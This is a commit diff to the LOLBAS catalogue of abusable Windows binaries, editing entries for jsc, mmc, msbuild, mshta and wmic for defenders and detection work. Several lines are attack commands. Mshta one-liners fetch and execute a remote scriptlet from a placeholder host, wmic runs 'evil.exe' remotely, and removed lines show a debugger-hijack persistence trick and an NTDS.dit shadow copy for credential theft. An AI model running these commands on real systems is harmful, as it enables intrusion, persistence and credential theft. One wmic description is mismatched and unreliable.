Addressing @bohops's feedback

yml/OSBinaries/Jsc.yml

@@ -1,18 +1,18 @@
 ---
 Name: Jsc.exe
-Description: Binary file used by .NET to compile javascript code to .exe or .dll format
+Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format
 Author: 'Oddvar Moe'
 Created: 2019-05-31
 Commands:
   - Command: jsc.exe scriptfile.js
-    Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
+    Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe.
     Usecase: Compile attacker code on system. Bypass defensive counter measures.
     Category: Compile
     Privileges: User
     MitreID: T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
   - Command: jsc.exe /t:library Library.js
-    Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
+    Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
     Usecase: Compile attacker code on system. Bypass defensive counter measures.
     Category: Compile
     Privileges: User

yml/OSBinaries/Mmc.yml

@@ -10,7 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218.014
-    OperatingSystem: Windows 10 (and possibly earlier versions)
+    OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
   - Command: mmc.exe gpedit.msc
     Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
     Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.

yml/OSBinaries/Msbuild.yml

@@ -18,15 +18,8 @@ Commands:
     Privileges: User
     MitreID: T1127.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: msbuild.exe @sample.rsp
-    Description: Executes Logger statements from rsp file
-    Usecase: Execute DLL
-    Category: Execute
-    Privileges: User
-    MitreID: T1127.001
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
-    Description: Executes generated Logger dll file with TargetLogger export
+    Description: Executes generated Logger DLL file with TargetLogger export
     Usecase: Execute DLL
     Category: Execute
     Privileges: User
@@ -39,6 +32,13 @@ Commands:
     Privileges: User
     MitreID: T1127.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: msbuild.exe @sample.rsp
+    Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
+    Usecase: Bypass command-line based detections
+    Category: Execute
+    Privileges: User
+    MitreID: T1036
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
@@ -69,6 +69,7 @@ Resources:
   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
   - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
   - Link: https://github.com/LOLBAS-Project/LOLBAS/issues/165
+  - Link: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files
   - Link: https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events
 Acknowledgement:
   - Person: Casey Smith

yml/OSBinaries/Mshta.yml

@@ -11,14 +11,14 @@ Commands:
     Privileges: User
     MitreID: T1218.005
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
+  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
     Description: Executes VBScript supplied as a command line argument.
     Usecase: Execute code
     Category: Execute
     Privileges: User
     MitreID: T1218.005
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
     Description: Executes JavaScript supplied as a command line argument.
     Usecase: Execute code
     Category: Execute
@@ -36,7 +36,7 @@ Full_Path:
   - Path: C:\Windows\System32\mshta.exe
   - Path: C:\Windows\SysWOW64\mshta.exe
 Code_Sample:
-  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
+  - Code: https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/05c58b4892942c34bfa01e9ada88ef2663858e1c/rules/windows/process_creation/win_susp_mshta_pattern.yml
   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_invoke_obfuscation_via_use_mhsta.yml

yml/OSBinaries/Wmic.yml

@@ -18,13 +18,6 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
-    Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
-    Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
-    Category: Execute
-    Privileges: User
-    MitreID: T1218
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
   - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
     Description: Execute evil.exe on the remote system.
     Usecase: Execute binary on a remote system
@@ -32,20 +25,6 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
-    Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
-    Usecase: Execute binary with scheduled task created with wmic on a remote computer
-    Category: Execute
-    Privileges: User
-    MitreID: T1218
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
-    Description: Create a volume shadow copy of NTDS.dit that can be copied.
-    Usecase: Execute binary on remote system
-    Category: Execute
-    Privileges: User
-    MitreID: T1218
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
     Description: Create a volume shadow copy of NTDS.dit that can be copied.
     Usecase: Execute binary on remote system